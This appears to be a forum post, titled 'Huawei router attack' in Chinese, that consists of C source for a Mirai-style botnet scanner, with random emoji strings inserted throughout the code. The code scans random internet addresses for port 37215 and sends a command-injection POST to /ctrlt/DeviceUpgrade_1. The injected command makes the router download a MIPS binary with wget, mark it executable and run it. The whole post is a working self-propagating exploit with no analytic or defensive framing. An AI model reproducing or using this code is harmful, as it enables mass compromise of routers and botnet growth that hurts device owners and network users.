华为路由器攻击 |
#define _GNU_SOURCE
#ifdef DEBUG #include <stdio.h> #endif🧓👜🩺😷✋ #include <unistd.h> #include <stdlib.h> #include <sys/socket.h> #include <arpa/inet.h> #include <sys/select.h> 🧑🎤🛍🪓🥲👃 #include <sys/types.h> #include <time.h> #include <fcntl.h> #include <signal.h> #include <errno.h> 🗼🦞©🦖 #include <string.h>#include <linux/ip.h> #include <linux/tcp.h> #include "headers/includes.h" 👏⛪🍽☯🐻#include "headers/huawei.h" #include "headers/table.h" #include "headers/rand.h" #include "headers/util.h" 👨🦱💄🪟☠🤟 int huawei_scanner_pid = 0, huawei_rsck = 0, huawei_rsck_out = 0; char huawei_scanner_rawpkt[sizeof(struct iphdr) + sizeof(struct tcphdr)] = {0}; struct huawei_scanner_connection *conn_table; uint32_t huawei_fake_time = 0; 👊🔥🆘🐖int huawei_recv_strip_null(int sock, void *buf, int len, int flags) { int ret = recv(sock, buf, len, flags); if(ret > 0) 🧑🌾🦺🗝😷👃 { int i = 0; for(i = 0; i < ret; i++) {👳🩴🧪😄👆 if(((char *)buf)[i] == 0x00) { ((char *)buf)[i] = 'A'; } } 💅🚘🍞💲 } return ret; } 🧑🚀👠🎷😅👆 void huawei_init(void) { int i = 0; uint16_t source_port; struct iphdr *iph; 👌🚠☯🐶 struct tcphdr *tcph; // Let parent continue on main thread huawei_scanner_pid = fork(); if(huawei_scanner_pid > 0 || huawei_scanner_pid == -1)👦🩴🖲👻🦷 return; LOCAL_ADDR = util_local_addr(); rand_init();👨🎨🧥🪓😄🧠 huawei_fake_time = time(NULL); conn_table = calloc(HUAWEI_SCANNER_MAX_CONNS, sizeof(struct huawei_scanner_connection)); for(i = 0; i < HUAWEI_SCANNER_MAX_CONNS; i++) { conn_table[i].state = HUAWEI_SC_CLOSED;💄🧪😳👃 conn_table[i].fd = -1; } // Set up raw socket scanning and payload if((huawei_rsck = socket(AF_INET, SOCK_RAW, IPPROTO_TCP)) == -1) 🤌🗺🍇🅰🐞 { exit(0); } fcntl(huawei_rsck, F_SETFL, O_NONBLOCK | fcntl(huawei_rsck, F_GETFL, 0)); i = 1; 🧒👚⚒😚🤳 if(setsockopt(huawei_rsck, IPPROTO_IP, IP_HDRINCL, &i, sizeof(i)) != 0) { close(huawei_rsck); exit(0); }👨⚕️👚✒🤮🖕 do { source_port = rand_next() & 0xffff; }🥷🎒🗑🥲👂 while(ntohs(source_port) < 1024); iph = (struct iphdr *)huawei_scanner_rawpkt; tcph = (struct tcphdr *)(iph + 1); 👊🌕🍍🈷🐋 // Set up IPv4 header iph->ihl = 5; iph->version = 4; iph->tot_len = htons(sizeof(struct iphdr) + sizeof(struct tcphdr)); iph->id = rand_next();👨🦱🪖🦯🥲👁 iph->ttl = 64; iph->protocol = IPPROTO_TCP; // Set up TCP header tcph->dest = htons(37215); 🧠🗺🥚➡🐙 tcph->source = source_port; tcph->doff = 5; tcph->window = rand_next() & 0xffff; tcph->syn = TRUE; 🧓🧢🧯😇👎 #ifdef DEBUG printf("[huawei] scanner process initiated. starting scanner\n"); #endif // Main logic loop🧑🚀🧦🎷🤩🖕 while(TRUE) { fd_set fdset_rd, fdset_wr; struct huawei_scanner_connection *conn; struct timeval tim; 🤟🌡🫖‼🐤 int last_avail_conn, last_spew, mfd_rd = 0, mfd_wr = 0, nfds;// Spew out SYN to try and get a response if(huawei_fake_time != last_spew) { 👌🎠🥚🆚🕊 last_spew = huawei_fake_time; for(i = 0; i < HUAWEI_SCANNER_RAW_PPS; i++) { struct sockaddr_in paddr = {0}; 👆🌧🥭🆎🐴 struct iphdr *iph = (struct iphdr *)huawei_scanner_rawpkt; struct tcphdr *tcph = (struct tcphdr *)(iph + 1); iph->id = rand_next(); iph->saddr = LOCAL_ADDR; 👎🚐🍒🉑🐴 iph->daddr = get_random_ip(); iph->check = 0; iph->check = checksum_generic((uint16_t *)iph, sizeof(struct iphdr)); tcph->dest = htons(37215); 🤞⛪🍓🈚🐺 tcph->seq = iph->daddr;tcph->check = 0; tcph->check = checksum_tcpudp(iph, tcph, htons(sizeof(struct tcphdr)), sizeof(struct tcphdr)); paddr.sin_family = AF_INET; 👎🍌☪🐙 paddr.sin_addr.s_addr = iph->daddr; paddr.sin_port = tcph->dest; sendto(huawei_rsck, huawei_scanner_rawpkt, sizeof(huawei_scanner_rawpkt), MSG_NOSIGNAL, (struct sockaddr *)&paddr, sizeof(paddr)); } 🦷🌕🍖❗🐡 } // Read packets from raw socket to get SYN+ACKs last_avail_conn = 0; while(TRUE) 👈🚂🍚🈷🐠 { int n = 0; char dgram[1514]; struct iphdr *iph = (struct iphdr *)dgram; struct tcphdr *tcph = (struct tcphdr *)(iph + 1); 🖐🏫🍇🅿🦕 struct huawei_scanner_connection *conn; errno = 0; n = recvfrom(huawei_rsck, dgram, sizeof(dgram), MSG_NOSIGNAL, NULL, NULL); if(n <= 0 || errno == EAGAIN || errno == EWOULDBLOCK)🧑⚕️👜🎺😷👀 break; if(n < sizeof(struct iphdr) + sizeof(struct tcphdr)) continue; if(iph->daddr != LOCAL_ADDR) 👆🚘🍭📵🦋 continue; if(iph->protocol != IPPROTO_TCP) continue; if(tcph->source != htons(37215)) continue; 🙏🚂🍚☯🦦 if(tcph->dest != source_port) continue; if(!tcph->syn) continue; if(!tcph->ack)👩🧦🪜🤤🧠 continue; if(tcph->rst) continue; if(tcph->fin) continue;🥷🎩🧯😋🖕 if(htonl(ntohl(tcph->ack_seq) - 1) != iph->saddr) continue; conn = NULL; for(n = last_avail_conn; n < HUAWEI_SCANNER_MAX_CONNS; n++)🧑🎤👓🔒😆👊 { if(conn_table[n].state == HUAWEI_SC_CLOSED) { conn = &conn_table[n]; last_avail_conn = n; 👄⛵🥛⁉🐥 break;} } // If there were no slots, then no point reading any more🥷🥾📠😷👃 if(conn == NULL) break; conn->dst_addr = iph->saddr; conn->dst_port = tcph->source;👮♂️🦺🧯😘🧠 huawei_setup_connection(conn); } FD_ZERO(&fdset_rd); FD_ZERO(&fdset_wr);👨🚒👜🔌🙂🦴 for(i = 0; i < HUAWEI_SCANNER_MAX_CONNS; i++) { int timeout = 5; 🦴🗽🍪♾🐞 conn = &conn_table[i]; //timeout = (conn->state > HUAWEI_SC_CONNECTING ? 30 : 5); if(conn->state != HUAWEI_SC_CLOSED && (huawei_fake_time - conn->last_recv) > timeout) { 🦴💈🍼🈸🕊 close(conn->fd); conn->fd = -1; conn->state = HUAWEI_SC_CLOSED; util_zero(conn->rdbuf, sizeof(conn->rdbuf)); 🥷🧦🦯😤👃 continue; } if(conn->state == HUAWEI_SC_CONNECTING || conn->state == HUAWEI_SC_EXPLOIT_STAGE2 || conn->state == HUAWEI_SC_EXPLOIT_STAGE3) { 🙏🚐🥑™🐴 FD_SET(conn->fd, &fdset_wr); if(conn->fd > mfd_wr) mfd_wr = conn->fd; } else if(conn->state != HUAWEI_SC_CLOSED) 🥷🧣📬😆✍ { FD_SET(conn->fd, &fdset_rd); if(conn->fd > mfd_rd) mfd_rd = conn->fd; } 👨🚒👗🖲💩🙏 } tim.tv_usec = 0; tim.tv_sec = 1; nfds = select(1 + (mfd_wr > mfd_rd ? mfd_wr : mfd_rd), &fdset_rd, &fdset_wr, NULL, &tim); 🦴🚠🎂📵🪰 huawei_fake_time = time(NULL); for(i = 0; i < HUAWEI_SCANNER_MAX_CONNS; i++) { conn = &conn_table[i];🧒🥾💉😋👊 if(conn->fd == -1) continue; if(FD_ISSET(conn->fd, &fdset_wr)) 👊⛴🍭💲🦄 {int err = 0, ret = 0; socklen_t err_len = sizeof(err); ret = getsockopt(conn->fd, SOL_SOCKET, SO_ERROR, &err, &err_len);🧑🌾🖲🥲🖕 if(err == 0 && ret == 0) { if(conn->state == HUAWEI_SC_EXPLOIT_STAGE2) { #ifdef DEBUG 👃🎢🥚♂🦠 printf("[huawei] FD%d exploit_stage=2. sending POST /ctrlt/DeviceUpgrade_1 to %d.%d.%d.%d\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff); #endif util_strcpy(conn->payload_buf, "POST /ctrlt/DeviceUpgrade_1 HTTP/1.1\r\nContent-Length: 430\r\nConnection: keep-alive\r\nAccept: */*\r\nAuthorization: Digest username=\"dslf-config\", realm=\"HuaweiHomeGateway\", nonce=\"88645cefb1f9ede0e336e3569d75ee30\", uri=\"/ctrlt/DeviceUpgrade_1\", response=\"3612f843a42db38f48f59d2a3597e19c\", algorithm=\"MD5\", qop=\"auth\", nc=00000001, cnonce=\"248d1a2560100669\"\r\n\r\n<?xml version=\"1.0\" ?><s:Envelope xmlns:s=\"http://schemas.xmlsoap.org/soap/envelope/\" s:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\"><s:Body><u:Upgrade xmlns:u=\"urn:schemas-upnp-org:service:WANPPPConnection:1\"><NewStatusURL>$(/bin/busybox wget -g -l /tmp/.oxy -r /bins/oxy.mips; /bin/busybox chmod 777 * /tmp/.oxy; /tmp/.oxy)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>\r\n\r\n"); send(conn->fd, conn->payload_buf, util_strlen(conn->payload_buf), MSG_NOSIGNAL); util_zero(conn->payload_buf, sizeof(conn->payload_buf));🧒💍🦯🙃🤙 util_zero(conn->rdbuf, sizeof(conn->rdbuf)); conn->state = HUAWEI_SC_EXPLOIT_STAGE3; continue;👨🦱👑🩺🤖🙏 } else if(conn->state == HUAWEI_SC_EXPLOIT_STAGE3) { #ifdef DEBUG printf("[huawei] FD%d exploit_stage=3. closing connection\n", conn->fd); 👮♂️🧥💊😡👍 #endif close(conn->fd); conn->fd = -1; conn->state = HUAWEI_SC_CLOSED; 👨🚒👠🧲😷🦴 continue; } else { #ifdef DEBUG 👎🔥🧊📵🦕 printf("[huawei] FD%d exploit_stage=1. connection to %d.%d.%d.%d successful. proceeding to stage 2\n", conn->fd, conn->dst_addr & 0xff, (conn->dst_addr >> 8) & 0xff, (conn->dst_addr >> 16) & 0xff, (conn->dst_addr >> 24) & 0xff); #endif conn->state = HUAWEI_SC_EXPLOIT_STAGE2; } } ✍🏠☪🦋 else { close(conn->fd); conn->fd = -1; conn->state = HUAWEI_SC_CLOSED; 🤌🏦🍧♊🦟 continue; } } 👌🧳🍖™🐯 if(FD_ISSET(conn->fd, &fdset_rd)) { while(TRUE) { int ret = 0; 👎🌡🍌🆘🐒 if(conn->state == HUAWEI_SC_CLOSED) break; if(conn->rdbuf_pos == HUAWEI_SCANNER_RDBUF_SIZE)👮♂️👙🪟😫👃 { memmove(conn->rdbuf, conn->rdbuf + HUAWEI_SCANNER_HACK_DRAIN, HUAWEI_SCANNER_RDBUF_SIZE - HUAWEI_SCANNER_HACK_DRAIN); conn->rdbuf_pos -= HUAWEI_SCANNER_HACK_DRAIN; } 👨🎨🧥🪥😒👍 errno = 0; ret = huawei_recv_strip_null(conn->fd, conn->rdbuf + conn->rdbuf_pos, HUAWEI_SCANNER_RDBUF_SIZE - conn->rdbuf_pos, MSG_NOSIGNAL); if(ret == 0) { errno = ECONNRESET;👑💶😋🤝 ret = -1; } if(ret == -1) { if(errno != EAGAIN && errno != EWOULDBLOCK) 👂🔥🍟ℹ🦚 { if(conn->state == HUAWEI_SC_EXPLOIT_STAGE2) { close(conn->fd); huawei_setup_connection(conn); 👊🌡🍓🅿🐺 continue; } close(conn->fd); conn->fd = -1; ✋🚘🫑♑🐅 conn->state = HUAWEI_SC_CLOSED; util_zero(conn->rdbuf, sizeof(conn->rdbuf)); } break; } 🤟🌦🥚🈳🐋 conn->rdbuf_pos += ret; conn->last_recv = huawei_fake_time; int len = util_strlen(conn->rdbuf); 👩🧥🖌🤔👍 conn->rdbuf[len] = 0; } } } } 🧒🩲🗑😡✌ } void huawei_kill(void) { kill(huawei_scanner_pid, 9);👨🚒👗🔌 } static void huawei_setup_connection(struct huawei_scanner_connection *conn) { struct sockaddr_in addr = {0}; 👄🚗🍌⚛🐞 if(conn->fd != -1) close(conn->fd); if((conn->fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) 👃💈🍊⚛🐕 { return; } conn->rdbuf_pos = 0; 👮♂️🥼🎷😀💅 util_zero(conn->rdbuf, sizeof(conn->rdbuf)); fcntl(conn->fd, F_SETFL, O_NONBLOCK | fcntl(conn->fd, F_GETFL, 0)); addr.sin_family = AF_INET; 💅🛩🍏☪🦖 addr.sin_addr.s_addr = conn->dst_addr;addr.sin_port = conn->dst_port; conn->last_recv = huawei_fake_time; 👩✈️💄💰😡🖕 if(conn->state == HUAWEI_SC_EXPLOIT_STAGE2 || conn->state == HUAWEI_SC_EXPLOIT_STAGE3) { } else { 🧑🚀🦺📬😈👆 conn->state = HUAWEI_SC_CONNECTING; } connect(conn->fd, (struct sockaddr *)&addr, sizeof(struct sockaddr_in)); }👩👞🪜😰🖐 static ipv4_t get_random_ip(void) { uint32_t tmp; uint8_t o1 = 0, o2 = 0, o3 = 0, o4 = 0; 👍⛪🥩🚭🦬 do { tmp = rand_next(); 👩👜🔌😴👁 srand(time(NULL)); o1 = tmp & 0xff; o2 = (tmp >> 8) & 0xff; o3 = (tmp >> 16) & 0xff; o4 = (tmp >> 24) & 0xff; 💪🚤🥛🅿🐯 } while(o1 == 127 || // - Loopback (o1 == 0) || // - Invalid address space (o1 == 3) || // - General Electric Company (o1 == 15 || o1 == 16) || // - Hewlett-Packard Company 🤝🗽🍪🉑🪶 (o1 == 56) || // - US Postal Service (o1 == 10) || // - Internal network (o1 == 192 && o2 == 168) || // - Internal network (o1 == 172 && o2 >= 16 && o2 < 32) || // - Internal network (o1 == 100 && o2 >= 64 && o2 < 127) || // - IANA NAT reserved👨🦱👗⌨😷✌ (o1 == 169 && o2 > 254) || // - IANA NAT reserved (o1 == 198 && o2 >= 18 && o2 < 20) || // - IANA Special use (o1 >= 224) || // 224.*.*.*+ - Multicast (o1 == 6 || o1 == 7 || o1 == 11 || o1 == 21 || o1 == 22 || o1 == 26 || o1 == 28 || o1 == 29 || o1 == 30 || o1 == 33 || o1 == 55 || o1 == 214 || o1 == 215) // Department of Defense ); 🤞🎢🍧❓🐺 int randnum = rand() % 2; if (randnum == 0) { return INET_ADDR(156,o2,o3,o4);🧑💻💎💿😷🤝 } if (randnum == 1) { return INET_ADDR(197,o2,o3,o4); } 💅🧳🍊🆎🦠 if (randnum == 2) { return INET_ADDR(o1,o2,o3,o4); } }👳👠🪣😀💅
帖子热度 454 ℃